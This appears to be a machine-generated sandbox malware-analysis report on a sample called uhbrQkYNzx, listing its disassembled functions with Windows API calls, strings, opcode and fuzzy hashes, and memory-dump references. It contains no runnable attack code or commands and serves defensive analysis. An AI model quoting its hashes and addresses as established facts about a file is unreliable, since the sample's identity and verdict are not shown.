                                                              Similarity
                                                              • API ID: ItemText
                                                              • String ID:
                                                              • API String ID: 3367045223-0
                                                              • Opcode ID: c26765ddb0231f71627ab8055db78231753603845da20861fbf596c0b5b282d3
                                                              • Instruction ID: 5949375dab13a5715d96025483a5b52afaa370d13e532135e164fefeaa36768d
                                                              • Opcode Fuzzy Hash: c26765ddb0231f71627ab8055db78231753603845da20861fbf596c0b5b282d3
                                                              • Instruction Fuzzy Hash: 58C0EA31518241FF8B058B58E988D1ABBA6BB96311B518558F0548A120C331D920DB62
                                                              Function 009B4D13 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3c5f40f7f5f28757bbc27abe55cabb8398c6b40651cf9c627dd63867cfc4ab17
                                                              • Instruction ID: b9006df9b8dfb07ced63fe7fadc4586469da836c301d00f9b8b5b4b841c7375e
                                                              • Opcode Fuzzy Hash: 3c5f40f7f5f28757bbc27abe55cabb8398c6b40651cf9c627dd63867cfc4ab17
                                                              • Instruction Fuzzy Hash: F3A0019A2EE552BC310862916F06DBA562ED4D5F753318A2BF552C6183A98528992031
                                                              Function 0099E8D9 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0099D115,?,?,?,?,?,?,?), ref: 0099E8DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              • Opcode ID: 5b4df3dd277624ea7ac6953b2cc27eefd44970cf61c7f04acf799fb956a35c5a
                                                              • Instruction ID: 924336c090acc0bd345a438a8e1597de5a39c8686eed922ecfd56604d4a95e4b
                                                              • Opcode Fuzzy Hash: 5b4df3dd277624ea7ac6953b2cc27eefd44970cf61c7f04acf799fb956a35c5a
                                                              • Instruction Fuzzy Hash: 3DA00170615105CB9A415F21DE09A0E7A6AAE4169971980A8A40A89071DB2698A3AA45
                                                              Function 0099DE50 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,00000001,0099DE10,1AC349C0,?,00000000,009C93B1,000000FF,?,0099BEA6,?), ref: 0099DE6B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: e5d3723c3082ea722dd2b0509c3db3229ebb4c54fe84a1628821d7c92ad156e4
                                                              • Instruction ID: 0524b1b397549cbc05f6730ccec8834275784c2b8abc7674a99878d7cc9b79d8
                                                              • Opcode Fuzzy Hash: e5d3723c3082ea722dd2b0509c3db3229ebb4c54fe84a1628821d7c92ad156e4
                                                              • Instruction Fuzzy Hash: 69F0A770443B01DBDF349B7CC488756B7EC6B21325F048B1ED0F68A5E4C370A989DA50

                                                              Non-executed Functions

                                                              Function 00999B5C Relevance: 23.3, APIs: 9, Strings: 4, Instructions: 577fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00999CB1
                                                                • Part of subcall function 0099AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0099AC2E
                                                                • Part of subcall function 0099AC11: GetLastError.KERNEL32 ref: 0099AC72
                                                                • Part of subcall function 0099AC11: CloseHandle.KERNEL32(?), ref: 0099AC81
                                                                • Part of subcall function 00992F45: _wcslen.LIBCMT ref: 00992F50
                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00999EE1
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 00999F1E
                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 0099A0BF
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0099A127
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A134
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A14A
                                                              • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A18E
                                                              • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3517300771-3508440684
                                                              • Opcode ID: 4b09dc5848f4f2ce1b9ea70bca5a43a4e799c6f0e30b695cde97f5ea60ee1417
                                                              • Instruction ID: 31b8715b5672947f2671abf9779c4be780d13ebae2b3286f840dfde5bf898d63
                                                              • Opcode Fuzzy Hash: 4b09dc5848f4f2ce1b9ea70bca5a43a4e799c6f0e30b695cde97f5ea60ee1417
                                                              • Instruction Fuzzy Hash: 6D326D71904289AFDF24DFACCC85BEE77B8BF59314F104119E849EB291DB349A48CB61
                                                              Function 009B1630 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 275windowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009B163A
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 009B16BB
                                                              • EndDialog.USER32(?,00000006), ref: 009B16CE
                                                              • GetDlgItem.USER32(?,0000006C), ref: 009B16EA
                                                              • SetFocus.USER32(00000000), ref: 009B16F1
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                                • Part of subcall function 00991DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00991DFC
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 009B1763
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009B1783
                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 009B1826
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 009B18AD
                                                                • Part of subcall function 00991150: _wcslen.LIBCMT ref: 0099115B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                              • String ID: %s %s$REPLACEFILEDLG
                                                              • API String ID: 485132379-439456425
                                                              • Opcode ID: 8cea34c2769af727b2c6a5de27eff5dbae7a5011a4fafa97872107814124070d
                                                              • Instruction ID: a1902c8d496d6e53def9ecadd07159d461c85c37080b573dccb9a0a4ce251434
                                                              • Opcode Fuzzy Hash: 8cea34c2769af727b2c6a5de27eff5dbae7a5011a4fafa97872107814124070d
                                                              • Instruction Fuzzy Hash: A7A1BE71901219EAEF21EBB4CD9AFEEB77CAF95300F404198B209A7082DB705F448B61
                                                              Function 009C480E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: c8983e00fc40737cf67aab94411de1979265c378b203b0b6d0a268065447d4ba
                                                              • Instruction ID: b216e6ef3f6c6767d1df95c4a921bac1c824a7fe4a0af2b8e419e6c4658f23db
                                                              • Opcode Fuzzy Hash: c8983e00fc40737cf67aab94411de1979265c378b203b0b6d0a268065447d4ba
                                                              • Instruction Fuzzy Hash: 0DC25C71E086298FDB25CE28DD50BEAB7B9EB84304F1545EED44DE7240E778AE818F41
                                                              Function 00993D9D Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strlen.LIBCMT ref: 0099438C
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00994523
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 2172594012-2756464174
                                                              • Opcode ID: c66609b84bb92ad5d3c62eb1659ce95c0afe45379aab3d471a7d9a2b75160949
                                                              • Instruction ID: 6baf3d53ca2368e1eec2c27dc3a983b649842e49fe63b078b16c99d154615376
                                                              • Opcode Fuzzy Hash: c66609b84bb92ad5d3c62eb1659ce95c0afe45379aab3d471a7d9a2b75160949
                                                              • Instruction Fuzzy Hash: 3372E071A003448FDF19DF6CC895BEE7BA5BF5A300F08452DEC5A9B282DB70A945CB61
                                                              Function 009B6878 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009B6884
                                                              • IsDebuggerPresent.KERNEL32 ref: 009B6950
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009B6970
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 009B697A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 28a3d6ca25884784b84c2185b6ba49d99634af563388e91587d76457ccd3d008
                                                              • Instruction ID: f945a6f280577b7bd6f7ec711c3b6c3fa59cb3df383d888f9402db2061f75375
                                                              • Opcode Fuzzy Hash: 28a3d6ca25884784b84c2185b6ba49d99634af563388e91587d76457ccd3d008
                                                              • Instruction Fuzzy Hash: 76312BB5D492189BDF11DFA5DA89BCCBBB8BF04300F1041AAE40CAB250EB756A849F44
                                                              Function 0099932C Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0099952D,?,00000040,0099931E,00000001,?,?,?,?,0000001C,009A7618,009DE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00999330
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,0099952D,?,00000040,0099931E,00000001,?,?), ref: 00999351
                                                              • _wcslen.LIBCMT ref: 00999360
                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,009DE0C8,?,?,0099952D,?,00000040,0099931E,00000001,?,?,?,?,0000001C), ref: 00999373
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                              • String ID:
                                                              • API String ID: 991192900-0
                                                              • Opcode ID: c08cebe83922d92df271dd6d7790baaf1200d5478ea4d09c1840d3bb15dd3808
                                                              • Instruction ID: 5d3e0784daa21b46f5b22c034843264c0cbb0e20dfc7f6c46d0df069aabdd1f7
                                                              • Opcode Fuzzy Hash: c08cebe83922d92df271dd6d7790baaf1200d5478ea4d09c1840d3bb15dd3808
                                                              • Instruction Fuzzy Hash: F4F0A7B5914204FBEF04DFA99D06EFF7B7CEF85740B108019F502A6190DA749E01A774
                                                              Function 009B4E14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,009B4D59,0000001C,009B4F4E,00000000,?,?,?,?,?,?,?,009B4D59,00000004,009E5D84,009B4FDE), ref: 009B4E25
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,009B4D59,00000004,009E5D84,009B4FDE), ref: 009B4E40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              • Opcode ID: cfe51e9a0fc454cbfaae89aa4a45e609d7440a0e44bbe876bc7c007c931cd4c0
                                                              • Instruction ID: f4a614b0ad772d35c5cdefabe75f039baa38ec5ab16878501638df6a4192c829
                                                              • Opcode Fuzzy Hash: cfe51e9a0fc454cbfaae89aa4a45e609d7440a0e44bbe876bc7c007c931cd4c0
                                                              • Instruction Fuzzy Hash: 7301F772A001096BCB14DE29CC09BEE7BADAFC4338F0CC125ED19DB255D734D8118690
                                                              Function 009BAAC4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009B535E), ref: 009BABBC
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,009B535E), ref: 009BABC6
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,009B535E), ref: 009BABD3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 4ed276ee97fd90f47c88e0f8faef850f7d90b0bfab5c277e62a2583badaaf75d
                                                              • Instruction ID: 11625fe8ac91f493353292c29ba8cd0e4ef0213b529612ebb3288b345085b9ab
                                                              • Opcode Fuzzy Hash: 4ed276ee97fd90f47c88e0f8faef850f7d90b0bfab5c277e62a2583badaaf75d
                                                              • Instruction Fuzzy Hash: 3231D874D112289BCB21DF64D9887DCBBB8BF48320F5041DAE41CA7251E7309F818F45
                                                              Function 009C1FF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: b369b962d5f20d8f31d09de3e433722f9332b8b2219d80271264dde0cd86f945
                                                              • Instruction ID: cbd4942afa6cb53021524ab466698d51d2e13baaabb04b91204c13e0e165c0ad
                                                              • Opcode Fuzzy Hash: b369b962d5f20d8f31d09de3e433722f9332b8b2219d80271264dde0cd86f945
                                                              • Instruction Fuzzy Hash: 7831C172D04209ABDB24DF78CC84FEA7BADDB85314F04019DE91997292E6319E45CB51
                                                              Function 009C4360 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                              • Instruction ID: 1011c45a2d24e1f693e4e5966ba383dcfcc490665ed87a56744eef979e473c38
                                                              • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                              • Instruction Fuzzy Hash: 70024C71E002199BDF14CFA9C990BADB7F5EF88324F25426EE819E7384D731A9018B81
                                                              Function 009AFD34 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 009AFD6A
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,009D9714,?,?), ref: 009AFDB3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              • Opcode ID: cff5f6b59f84eabfe4363df9903ca580356f8f4a91b8af7bb40171780fecdc33
                                                              • Instruction ID: fa7f5604ee3b0da95f253ef81a386ff880c1ce8491a9d2704479323167574997
                                                              • Opcode Fuzzy Hash: cff5f6b59f84eabfe4363df9903ca580356f8f4a91b8af7bb40171780fecdc33
                                                              • Instruction Fuzzy Hash: 7F118B75225348ABDB10EF60DC41FEA77F8EF48704F01542AF905AB2A1E670A948DB64
                                                              Function 009948AA Relevance: 2.0, Strings: 1, Instructions: 776COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CMT
                                                              • API String ID: 0-2756464174
                                                              • Opcode ID: 74c9880af17889beba06eff8f15f6e64444843e8f7a649ddb2e299664fc15ad4
                                                              • Instruction ID: ca87a97675dafa5d05294f3e14c5107ede86fbcfd4dfda8df1afebf33af9ab1e
                                                              • Opcode Fuzzy Hash: 74c9880af17889beba06eff8f15f6e64444843e8f7a649ddb2e299664fc15ad4
                                                              • Instruction Fuzzy Hash: 5362B571A016499FDF09DF7CC881BEE7BA4BF59300F084179EC099B286DB34A945CBA1
                                                              Function 009C86D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                              Download Yara Rule
